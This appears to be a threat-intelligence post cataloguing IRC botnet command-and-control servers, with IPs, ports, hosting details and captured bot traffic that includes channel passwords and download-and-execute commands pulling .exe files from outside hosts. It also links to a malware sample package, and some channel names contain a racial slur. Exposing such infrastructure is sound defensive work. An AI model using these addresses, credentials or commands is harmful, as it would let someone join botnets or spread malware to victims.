Remote Host Port Number 46.105.164.74 2109 46.105.164.74 8782 NICK [USA|635435] USER 8770 “” “lol” :8770 JOIN #moo PONG :Threat-Expert.net NICK {iNF-00-USA-XP-COMP-7188} JOIN #hold nigger PONG Threat-Expert.net USER blaze * 0 :COMP hosting infos: http://whois.domaintools.com/46.105.164.74
64.34.200.181(irc botnet hosted in United States Newhall Serverbeach)
Remote Host Port Number 195.122.131.13 80 204.0.5.41 80 63.135.80.224 80 63.135.80.46 80 64.34.200.181 1234 PASS xxx NICK NEW-[USA|00|P|99411] USER XP-0024 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|99411] -ix JOIN #!nw! test PONG 22 MOTD hosting infos: http://whois.domaintools.com/64.34.200.181
208.117.34.213(ngrBot hosted in United States Laird Hill Steadfast Networks)
Remote Host Port Number 199.101.133.144 80 199.101.133.25 80 199.15.234.7 80 208.117.34.213 1888 PASS ngrBot PRIVMSG #XP :[d=”http://dc387.4shared.com/download/k1pyhC72/robertiniii.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0 NICK n{US|XPa}mgycnpm USER mgycnpm 0 0 :mgycnpm JOIN ##center 1963.g3rb3rs1t0.3691 JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://dc355.4shared.com/download/dPl-t_0P/fdbfdf542.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataLdxaxl.exe”Read more...
bugazi.zapto.org(irc botnet hosted in United Kingdom Maidenhead Simply Transit Ltd)
bugazi.zapto.org DNS_TYPE_A 213.229.78.226 Remote Host Port Number 213.229.78.226 1244 Channels: 4 channels formed Clients: I have 325 clients and 0 servers Local users: Current Local Users: 325 Max: 550 Global users: Current Global Users: 325 Max: 550 NICK new[iRooT-XP-USA]557688 USER 1754 “” “TsGh” :1754 PONG :65FDE65C JOIN #bugazi# aalbaklub1 PONG :HTTP1.4 hosting infos: http://whois.domaintools.com/213.229.78.226
78.47.197.2(irc botnet hosted in Germany Potsdam Hetzner Online Ag)
Remote Host Port Number 199.15.234.7 80 78.47.197.2 7200 PASS cheese or PASS gBot NICK New{US-XP-x86}3313868 USER 9317 “” “9130” :25529 MODE New{US-XP-x86}3313868 3qUu JOIN #Erection# NICK n{US|XPa}wdvgswy USER wdvgswy 0 0 :wdvgswy JOIN #nig# cheese JOIN #gBot# Channelisr00t hosting infos: http://whois.domaintools.com/78.47.197.2
Around 35mb malware samples
Here again with another package from diferent malwares Download: http://adf.ly/2QFHX
Darkside.GoV [Crew](irc bot hosted in United States Clarks Summit Volumedrive)
Remote Host Port Number 199.168.142.118 24789 NICK {US| |nwytlmh} USER UserName “” “879968799” :879968799 MODE {US| |oapbhdh} hosting infos: http://whois.domaintools.com/199.168.142.118
www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Resolved : [www.facebookvideocentral.com] To [46.45.164.229] Remote Host Port Number 46.45.164.229 80 NICK 0USAicqigqz JOIN #unk2 …. USER yztwfqz * 0 :yztwfqz MODE 0USAicqigqz -ix Now talking in #unk2 Topic On: [ #unk2 ] [ ] Topic By: [ j ] Now talking in #unk3 Topic On: [ #unk3 ] [ .down http://46.45.164.228/t4.exe c:48o9o8k8s3i8.exe.exe 1 ]Read more...
ithiroba.jp(irc botnet hosted in Japan Tokyo Hatakeyama Noboru)
Resolved : [ithiroba.jp] To [210.162.102.26] Remote Host Port Number 210.162.102.26 6969 NICK {NEW}[USA][XP]161730 USER 4197 “” “lol” :4197 JOIN #spmx PONG :fatalz.net hosting infos: http://whois.domaintools.com/210.162.102.26
alfaroooq.com(ngrBot hosted in United States New York Dnsslave.com)
Remote Host Port Number 173.0.59.37 3922 PASS 441 199.15.234.7 80 67.225.136.187 80 NICK n{US|XPa}pzammgy USER pzammgy 0 0 :pzammgy JOIN #alfa … PRIVMSG #alfa :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s) hosting infos: http://whois.domaintools.com/173.0.59.37